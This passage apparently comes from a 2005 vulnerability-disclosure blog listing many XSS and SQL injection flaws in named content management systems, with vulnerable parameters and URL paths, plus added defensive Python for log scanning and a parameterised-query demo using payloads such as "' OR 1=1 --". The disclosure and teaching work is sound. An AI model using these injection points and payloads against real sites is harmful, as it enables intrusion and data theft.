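    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decoded once already; decoding again catches double-encoded input.
        decoded = unquote(value)
        if TAG_RE.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(text):
    """Return (client_ip, path, hits) for every request that carries a probe."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group("target"))
        if hits:
            client_ip = line.split(" ", 1)[0]
            findings.append((client_ip, urlsplit(match.group("target")).path, hits))
    return findings


if __name__ == "__main__":
    for client_ip, path, hits in scan_log(SAMPLE_LOG):
        for name, value in hits:
            print(f"{client_ip} {path} param={name!r} value={value!r}")
```

The check requires a letter after '<' so that ordinary text such as "i<3" is not flagged; it will still flag legitimate values that happen to contain tag-like tokens, so treat hits as a triage queue rather than alerts. Probes submitted through a form field, as in the SonyEricsson and Sagem cases above, travel in a POST body and never appear in the access log's request line, so this scan does not see them.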

    OpenEdit XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.openedit.org
    affected version:4.0 and prior

    Product Description:

    Developed in partnership with Web designers, OpenEdit offers a host of popular features. It includes easy online editing, sophisticated eCommerce, corporate blogging and dynamic layouts in an open source environment for flexible, advanced website development. OpenEdit President Christopher Burkey and a core team of expert Java architects have created OpenEdit by combining the best of existing Java frameworks.

    Vuln. Description:

    OpenEdit contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "page" and "oe-action" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:
    /store/search/results.html?query=&department=&oe-action=[XSS]
    /store/search/results.html?page=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Tuesday, December 20, 2005

    OpenCms XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.opencms.org/
    affected version:6.0.3 and prior

    Product Description:

    OpenCms is a professional level Open Source Website Content Management System. OpenCms helps to create and manage complex websites easily without knowledge of html. An integrated WYSIWYG editor with a user interface similar to well known office applications helps the user creating the contents, while a sophisticated template engine enforces a site-wide corporate layout. As true Open Source software, OpenCms is completely free of licensing costs. OpenCms is based on Java and XML technology. Therefore it fits perfectly into almost any existing modern IT infrastructure. OpenCms runs in a "full open source" environment (e.g. Linux, Apache, Tomcat, MySQL) as well as on commercial components (e.g. Windows NT, IIS, BEA Weblogic, Oracle DB).

    Vuln. Description:

OpenCms contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module's parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Monday, December 19, 2005

    about our site and board.

We decided that our site and board will re-launch on 1 January 2006!
Because neither I nor our other team members have enough time to manage it; the site and board are working now, but they aren't public.
The board is only working because there are a lot of people who share their private advisories and exploits, which will be public only later or never.
Also, I hope cembo will soon release the "Alberts" DDoS attack tool publicly.
So, as you can imagine, we have a lot to do, but not enough time for everything.
We still need Spanish and German help for the board; the board will be in English (main), Latvian, Russian, Spanish (I hope) and German (I hope). Other languages and specialists are also welcome.
I know that many previous members can't wait to join the community board, but sorry, everything is in maintenance and we will be back only in 2006 :)

    NQcontent V3 XSS vuln.

    Vuln. discovered by : r0t
    Date: 19 dec. 2005
    vendor:http://www.nqcontent.com/
    affected version:V3 Professional Edition,V3 Enterprise Edition,V3 Comparison Matrix.

    Product Description:

    NQcontent is a dynamic web content management system that extends traditional CMS capabilities to include a powerful application development and integration framework. NQcontent will revolutionise the speed and ease of delivery of your internet, intranet, extranet and portals, seamlessly integrating and future proofing your online investment.



    Vuln. Description:

NQcontent contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module's parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    MMBase XSS vuln.

    Vuln. discovered by : r0t
    Date: 19 dec. 2005
    vendor:http://www.mmbase.org/
    affected version: 1.7.4 and prior


    Product Description:

    Open source object oriented Java based enterprise content management system. Platform independent, all major operating systems (Windows, Unix, Linux), databases (Oracle, DB2, Informix, MSSQL, MySQL, PostgreSQL) servlet containers (Tomcat, Orion, and J2EE application servers like JBoss, Jonas, IBM Websphere, BEA weblogic).


    Vuln. Description:

MMBase contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module's parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Miraserver SQL vuln.

    Vuln. discovered by : r0t
    Date: 19 dec. 2005
    vendor:http://www.miraserver.com
    affected version: Miraserver v.1.0 RC4 and prior


    Product Description:

    MiraServer is a content management system aimed to ease the task of web content delivery and management for large content portals, but has the flexibility to handle smaller sites as well. It can handle web pages, articles, news headlines and FAQs. Among its features are WYSIWYG editing, integrated user comment system, optional vBulletin integration, full template-control system, file attachments and much more.



    Vuln. Description:


Miraserver contains a flaw that allows remote SQL injection attacks. Input passed to the "page" parameter in "index.php", the "id" parameter in "newsitem.php" and the "cat" parameter in "article.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    examples:

    /index.php?page=[SQL]
    /newsitem.php?id=[SQL]
    /article.php?cat=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.
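The SQL injection advisories on this page come in two shapes: a bare number pasted into the WHERE clause (the "?page=[SQL]" cases such as this one, Marwel, Mercury CMS and Komodo) and a value inside a quoted string (the ODFaq "srcText=r0t[SQL]" case further down). The following is an added example, not Miraserver's or any other vendor's code: it builds a small SQLite table of constructed sample rows, shows the concatenated query beside its parameterised form for both contexts, and so runs offline. The table, its rows and the function names are assumptions made for the demonstration.

```python
"""SQL injection in numeric and string contexts, vulnerable vs parameterised.

Added example, not Miraserver's (or any other vendor's) code. The
'pages' table and its rows are constructed here; the query shapes mirror
the advisories' '?page=[SQL]' (bare number in the WHERE clause) and
'srcText=r0t[SQL]' (value inside a quoted string) cases, using SQLite
so the whole thing runs offline.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two published pages and one unpublished draft."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE pages (id INTEGER, title TEXT, published INTEGER);
        INSERT INTO pages VALUES (1, 'Home', 1);
        INSERT INTO pages VALUES (2, 'About', 1);
        INSERT INTO pages VALUES (3, 'Draft: unreleased', 0);
        """
    )
    return con


def page_vulnerable(con, page: str) -> list:
    """Like index.php?page=...: the raw parameter is pasted into the SQL.
    No quotes are needed to inject; '1 OR 1=1' rewrites the WHERE clause."""
    sql = f"SELECT title FROM pages WHERE published = 1 AND id = {page}"
    return [row[0] for row in con.execute(sql)]


def page_fixed(con, page: str) -> list:
    """Validate the type, then bind the value; the SQL text never changes."""
    try:
        page_id = int(page)
    except ValueError:
        return []  # reject non-numeric input instead of building SQL from it
    sql = "SELECT title FROM pages WHERE published = 1 AND id = ?"
    return [row[0] for row in con.execute(sql, (page_id,))]


def search_vulnerable(con, text: str) -> list:
    """Like faq.php?srcText=...: value inside quotes, so a quote breaks out
    and '--' comments away the rest of the statement."""
    sql = f"SELECT title FROM pages WHERE published = 1 AND title LIKE '%{text}%'"
    return [row[0] for row in con.execute(sql)]


def search_fixed(con, text: str) -> list:
    """Bound parameter: quotes in the value are data, not SQL syntax."""
    sql = "SELECT title FROM pages WHERE published = 1 AND title LIKE ?"
    return [row[0] for row in con.execute(sql, (f"%{text}%",))]


if __name__ == "__main__":
    con = make_db()
    for label, fn, value in (
        ("page, normal", page_vulnerable, "2"),
        ("page, injected", page_vulnerable, "1 OR 1=1"),
        ("page, fixed", page_fixed, "1 OR 1=1"),
        ("search, injected", search_vulnerable, "' OR 1=1 --"),
        ("search, fixed", search_fixed, "' OR 1=1 --"),
    ):
        print(f"{label:18} -> {fn(con, value)}")
```

The unpublished draft leaking into the injected results is the point: the "published = 1" filter is what the application relied on, and both payloads switch it off. The numeric case is the one that input "sanitising" most often misses, because there is no quote to escape; the fix is a type check plus a bound parameter, not quoting.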

    Sunday, December 18, 2005

    Mercury CMS™ vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.mercury-cms.com
    affected version:4.0 and prior


    Product Description:

    Mercury CMS™ v4.0 is an extensible, modular, enterprise-level content management system at entry-level costs. The four Editions of the CMS - Lite, Professional, Portal and E-Commerce - provide complete set of functionality to satisfy the business needs of our clients. Mercury CMS™ allows non-technical personnel to manage and edit content using secure and easy to use, browser-based interfaces.
    We designed the Mercury CMS™ v4.0 to provide maximum aesthetic flexibility by utilizing custom templates and multi-level styling. What makes this CMS unique are features like parallel editing, content granulation where pages are containers and content is organized in sections, snippets, modules; site is organized in areas (public, intranet, extranet, hidden); meta tags, styles, and repeating content are configured on multiple levels (global, area, page); and more.
    Flexible extensibility provides secure integration with third party and custom applications.
    The Architecture of Mercury CMS™ v4.0 allows for the inclusion of additional modules and technologies as you require them. There are more than 40 modules currently available for the system and this number constantly grows. We give you 17 of those modules for free to get you started fast and at very low cost.

    Vuln. Description:

    SQL.
Mercury CMS™ contains a flaw that allows remote SQL injection attacks. Input passed to the "page" parameter in "index.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    /index.cfm?page=[SQL]


    XSS.
Mercury CMS™ contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "content" and "criteria" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


/index.cfm?page=40&criteria=&start=11&title=&content=[XSS]

    /index.cfm?restricted=false&page=10&criteria=[XSS]



    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Marwel SQL inj.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:www.qcm.cz
    affected version:2.7 and prior

    Vuln. Description:

Marwel contains a flaw that allows remote SQL injection attacks. Input passed to the "show" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    /index.php?show=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Magnolia XSS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.magnolia.info
    affected version:2.1 and prior

    Product Description:

    Magnolia is the free, open source, J2EE deployable content management system (CMS) developed by obinary. Magnolia is written in Java and uses the upcoming standard API for Java-based content repositories (JCR) to access its content. It has an easy to use web-browser interface, a clear API and a useful custom tag library for easy templating in JSP and Servlets.
    Magnolia is the first open-source content-management-system (CMS) which has been built from scratch to support the upcoming standard API for java content repositories (JCR).
    Its main goal is ease of use for all parties involved in running a CMS.
    Magnolia is distributed as a double-clickable binary installer. It includes everything you need to get you started with a standalone installation in less than 10 minutes. Magnolia runs on all common operating-systems (JDK 1.4.1 or later required). No additional software or databases are needed.
    Magnolia Content Management features a very flexible structure, platform-independence through the use of Java and XML, a simple to use API, easy templating through the use of JSP, JSTL and a custom tag library, automatic administrative UI generation, transparent and uniform data access to multiple data repositories, easy configuration through XML, easy application integration and easy deployment with professional staging on any J2EE Server.
    Magnolia is actively being developed by obinary. It is available free of charge as an open source product. We provide a binary download based on tomcat for easy deployment on Mac OS X, Windows, Linux and Solaris.


    Vuln. Description:

Magnolia contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "query" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /search.html?query=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Lutece XSS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://lutece.paris.fr
    affected version:1.2.3 and prior

    Product Description:

    Lutece is a web portal engine that lets you quickly create internet or intranet dynamic sites based on HTML, XML or database contents. This Open Source software is written in Java and mainly based on Apache Software Foundation (Jakarta and XML projects). Lutece runs as well under Linux or Windows platforms. The default database is MySQL. Lutece provides a very simple administration interface that can be used directly by end users without any technical skills. Lutece is free software, distributed under a BSD like license.

    Vuln. Description:

Lutece contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module's parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Lighthouse CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.lighthouse-cms.de/en/
    affected version:1.1.0 and prior


    Product Description:

    Lighthouse is a modern, user friendly, high performance Content Management System. Lighthouse lets you create and manage web applications intuitively.
    Lighthouse allows you easy access and effective management of your web presence. Lighthouse enables you to put Enterprise Content Management to use for your business. With its modular structure, it offers you exactly the features you need, saving you time and money.
    Lighthouse is at home on all major platforms and can be used with a wide range of databases.

    Vuln. Description:

Lighthouse contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "search" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    /?search=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Liferay Portal Enterprise 3.6.1 XSS

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://liferay.com/
    affected version:3.6.1 and prior

    Product Description:

    One of the leading open-source portal servers with a flexible, business-friendly license, Liferay is truly open source and doesn't lock you in to a specific vendor's database or application server. We also have a dedicated team of developers and consultants to complement our product with support, training, and professional services. We are one of the most mature products in the portal space and have complemented our existing CMS functionality with a slew of new features in version 3.6.1 that make integration of portal and CMS applications easier than ever. Liferay Portal ships with more portlets out of the box than any other portal platform. It can be run on a servlet container or a full-blown J2EE application server.

    Vuln. Description:

Liferay Portal Enterprise contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "_77_struts_action", "p_p_mode" and "p_p_state" parameters and to the search module's parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

/web/guest/downloads/portal_ent?p_p_id=77&p_p_action=1&p_p_state=maximized&p_p_mode=view&p_p_col_order=null&p_p_col_pos=2&p_p_col_count=3&_77_struts_action=[XSS]


/web/guest/downloads/portal_ent?p_p_id=77&p_p_action=1&p_p_state=maximized&p_p_mode=[XSS]


/web/guest/downloads/portal_ent?p_p_id=77&p_p_action=1&p_p_state=[XSS]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Libertas Enterprise CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.libertas-solutions.com/
    affected version:3.0 and prior

    Product Description:

    Libertas Enterprise Content Management Server is used by larger organisations and government departments. Standards compliance is core to this CMS product with Dublin Core, eGifs, eForms, UK Government Access Keys and support for numerous XML standards. The system's n-tier architecture is highly scalable ensuring maximum availability. The interface is exceptionally easy to use, requiring limited training for staff already familiar with popular word processing applications. Like all Libertas Solutions suite of CMS products, creating accessible websites is fundamental with tools to ensure WAI / section 508 compliant sites.


    Vuln. Description:

Libertas Enterprise CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "page_search" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

/search/index.php?advanced=0&associated_list=&page=1&search=0&page_search=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    damoon® XSS vuln

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.mindroute.us/?id=2452
    affected version: latest


    Vuln. Description:

damoon® contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module's parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    lemoon® XSS vuln

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.mindroute.us/?id=426
    affected version: 2.0 and prior


    Product Description:

lemoon® is a fully packaged CM software solution that combines simplicity with versatility. It requires no third party licenses and thus offers a very competitive price. A free demo is available. Customers using lemoon® include Sony Ericsson, Precise Biometrics, Q-MATIC, AudioDev, Pharmadule Emtunga and more.

    Vuln. Description:

lemoon® contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module's parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Komodo CMS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.komodocms.com/
affected version: v2.1 and prior; other editions may have the same vuln.


    Product Description:

    Intuitive, simple-to-use and powerful web content management system. Cross browser and cross platform, Komodo CMS has been developed to give control back to organizations, empowering them to maintain and manage their web infrastructure. Komodo CMS is particularly suitable for organizations who see their website as a marketing and business generation channel. Why compromise on design or ease of use when you can have both? Komodo CMS purchase price includes design integration and training.


    Vuln. Description:

    1. SQL inj.

Komodo CMS contains a flaw that allows remote SQL injection attacks. Input passed to the "page" parameter in "page.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:

    /page.php?page=[SQL]

Note: to test or exploit this vuln., switch off JavaScript support in your browser (or fetch the page with a client that does not execute it), because on an error Komodo answers with a redirect :)


    2. XSS

Komodo CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module's parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    ODFaq SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.oodie.com/project/odfaq/
    affected version: 2.1.0 and prior

    Product Description:

    PHP application that allows you to manage frequently asked questions. You can create/edit/delete entries using user-friendly web based interface.

    Vuln. Description:

ODFaq contains a flaw that allows remote SQL injection attacks. Input passed to the "cat" and "srcText" parameters in "faq.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Note that "cat" is used as a bare number (no quote is needed to inject) while "srcText" is used inside a quoted string.

    examples:

    /faq.php?cat=1[SQL]

/faq.php?p=search&srcText=r0t[SQL]&submit=Go&cat_id=&srcWhat=&dosearch=1

    Solution:
    Edit the source code to ensure that input is properly sanitised.
    ----------------------------------------------------------------
PS. Greetings to the OSVDB bloggers :)

    Saturday, December 17, 2005

    Hot Banana XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:www.hotbanana.com/products/web-content-management-suite/
    affected version: 5.3 and prior

Product Description:

    Founded in 1999, Hot Banana powers Web sites for more than 180 companies worldwide. Designed for non-technical users, Hot Banana is a full-fledged Web Content Management Suite that manages the content creation and delivery process of a Web site. The Hot Banana Active Marketing Web Content Management Suite consists of the end-to-end integration of Web Content Management, Internet marketing, search engine optimization - SEO, and WebTrends 7.5 Web analytics. Hot Banana is an ideal Web site solution for online branding, corporate communications, lead generation & conversion campaigns, customer retention, PR, and event marketing programs. Hot Banana is available as Hot Banana On-Demand (Software-as-a-Service (SaaS)), or as Hot Banana Licensed. Clients include; Algoma Steel, Bell Industries, Parents Action for Children, Ansell Healthcare Europe, World Vision, Beaver Vending, Los Alamos School Board (New Mexico), Law Society of Upper Canada, Expertech, and The County of Simcoe. Hot Banana Software Inc. is profitable and privately held. www.hotbanana.com


    Vuln. Description:

Hot Banana contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "keywords" parameter in "index.cfm" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /search/index.cfm?keywords=[XSS]&x=25&y=9

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Honeycomb Archive & Honeycomb Archive Enterprise vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.quicksquare.com/
    affected version:Honeycomb Archive 3.0 and Honeycomb Archive Enterprise


    Product Description:

    Honeycomb Archive™ is an image library service that functions as a stand-alone web site solution providing a central repository for graphics & files needed to support marketing, advertising, and sales personnel with print and web publishing needs. Industry leaders such as Master Lock® & Valvoline® rely on Honeycomb Archive™ every day to distribute the correct brand images to thousands of users from all over the world.


    Vuln. Description:

    1. Multiple SQL inj. vuln. in Honeycomb Archive and Honeycomb Archive Enterprise

Honeycomb Archive and Honeycomb Archive Enterprise contain a flaw that allows remote SQL injection attacks. Input passed to the "series", "cat_parent", "cat" and "div" parameters in "CategoryResults.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    examples:

    /CategoryResults.cfm?div=7&cat=118&cat_parent=107&series=[SQL]
    /CategoryResults.cfm?div=7&cat=118&cat_parent=[SQL]
    /CategoryResults.cfm?div=7&cat=[SQL]
    /CategoryResults.cfm?div=[SQL]

    2. XSS in Honeycomb Archive Enterprise search module

Honeycomb Archive Enterprise contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module's parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    FLIP XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.flipdev.org/
    affected version: 0.9.0.1029 and prior

    Product Description:

    The Free Lanparty Inter-/Intranet Portal contains CMS, Groupware and LAN-Party specific features.

    Vuln. Description:

FLIP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "name" parameter in "text.php" and the "frame" parameter in "forum.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /text.php?name=[XSS]
    /forum.php?frame=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    FarCry XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://farcry.daemon.com.au/
    affected version:3.0 and prior


    Product Description:

FarCry is an open source Content Management System (CMS), originally developed by Daemon. It's fully functional, and runs in a host of Enterprise environments today. It requires the Macromedia ColdFusion MX platform and a viable enterprise database (currently FarCry supports MSSQL, Oracle, PostgreSQL and MySQL). The solution runs on Windows 2k+ and a variety of *nix platforms (including Solaris and OSX).


    Vuln. Description:

FarCry contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search parameters of the search module isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Esselbach Storyteller CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.esselbach.com/
    affected version: 1.8 and prior

    Product Description:

    Esselbach Storyteller CMS is a powerful Content Management System designed for high traffic websites

    Vuln. Description:

Esselbach Storyteller CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search parameters of the search module isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    EPiX™ Search query XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.go-epix.net/
    affected version:3.1.2 and prior


    Product Description:

    EPIX is a low cost portal solution with CMS capabilities as well as support for JSR168 portlets. It is J2EE (Java) based and runs on any platform.

    Vuln. Description:

EPIX contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search query parameter of the search module isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    e-publish CMS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.e-publish.gr/
    affected version:v2.0 and prior

    Product Description:

The e-publish web application is a content management system that is perfect for publishing newspapers, magazines or any other content over the Internet. It is very convenient to manage the contents of the site in an easy and quick way through the administration module. No special knowledge is required. e-publish integrates with a banner campaign utility. Through this service the site owner can administer any advertising banner campaign in the site. Available also in a multilingual edition.

    Vuln. Description:

1. SQL inj.

e-publish contains a flaw that allows remote SQL injection attacks. Input passed to the "id" parameter in "printer_friendly.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    2. XSS

e-publish contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "obcatid" and "comid" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /printer_friendly.cfm?id=[SQL]

    /show.cfm?id=274&obcatid=10[XSS]

    /show.cfm?id=279&how=5&obcatid=9&shfrm=
    1&comid=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Direct News SQL inj.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor: http://www.direct-news.net
    affected version: 4.9 and prior


    Product Description:

Direct News 4.9 is an easy-to-use CMS based on PHP and MySQL. Its real goal is simplicity and usability, so that it can be used by all. In addition to the WYSIWYG editor, navigation management, image library and image tools, Direct News 4.9 comes with new Macromedia Flash compatibility.
Direct News is one of the few CMS to offer you the ability to manage your Flash animation contents directly through the very easy interface of Direct News.
Direct News improves your Search Engine Optimization by rewriting the links and allowing you to describe your content as you want.
Of course, Direct News can manage a shopping cart, multi-language websites (with Chinese, Russian and others) and administration interfaces. Direct News is also available in a smaller, limited version.


    Vuln. Description:

    Direct News contains a flaw that allows remote SQL injection attacks. Input passed to the "setLang" parameter and the search module parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /?setLang=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    ContentServ 3.1 SQL inj.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.contentserv.com/
    affected version: 3.1 and prior

    Product Description:

    ContentServ encompasses more than simple Content Management. It stands for Enterprise Marketing Management Solutions and a holistic approach, aimed at providing full-scale support of all marketing activities. Thus, it also includes Cross Media Publishing, Customer Relationship Management, Catalog and Product Information Management, and also Media Asset Management, to name a few. The EMMS Suite provides a highly professional solution for the creation and maintenance of content, regardless of whether it is to be published in web, print, or other forms of media. Particularly attractive are the numerous possibilities to steer and control all processes concerning content. Among these are a detailed Workflow Management, intelligent definition of user rights, Version Management, and many more. Additionally, the system is structured in a very open manner, allowing easy and seamless blending into existing system environments, and trouble-free connection with other components such as SAP or various databases. The most outstanding feature, however, lies in Cross Media Publishing. It enables the publication of content into any medium desired. This is possible through support for over 27 exchange formats. These interfaces make ContentServ the most innovative provider of solutions for the creation, maintenance and publication of content.

    Vuln. Description:

    ContentServ contains a flaw that allows remote SQL injection attacks. Input passed to the "StoryID" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:

    /index.php?StoryID=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    t-online Server not ready :)

    Server not ready

    Dear T-Online User:

    Unfortunately, we are experiencing technical difficulties at this time.
    We are doing what we can to solve the problem as quickly as possible.
    Please try again shortly.

    Thank you for your patience!

    Your T-Online Team



    http://brisbane.t-online.de/fast-cgi/tsc?q=r0t&mandant=toi&device=html&portallanguage=de&userlanguage=r0t

    CONTENS "search.cfm" Multiple Input Validation Vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.contens.com
    affected version:3.0 and prior

    Product Description:

    CONTENS Software GmbH provides Content Management Software (CMS) for companies with sophisticated online communication needs. Its line of products meets the demands of businesses from small online editors to international firms. A strong network of experienced partners conceives innovative and customized CONTENS solutions and implements them according to individual demands. With the help of the CONTENS platform-independent CMS products, businesses can quickly realize and edit extensive online projects without any prior programming knowledge. Among the well-known businesses that use CONTENS Content Management products are Concordia Insurance Group, Credit Suisse, Davidoff, Discovery Channel, Eurocard, GlobeGround Servisair, Hapimag, HypoVereinsbank BKK, John Deere, Max-Planck, MVV Energie AG, Peri, ratiopharm, T-Mobile and Schwyzer Kantonalbank.

    Vuln. Description:

    1. XSS

    CONTENS contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "near" parameter in "search.cfm" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    /search.cfm?uselang_en=1&intern=0&targetgroup=pub&fuseaction_sea=results&advanced=1&criteria=r0t&submit.x=33&submit.y=10&submit=Search&bool=or&itemsperpage=10&near=[XSS]


    2. Full path and sensitive information disclosure.
    To view the install path and other sensitive information, use one of the examples below:

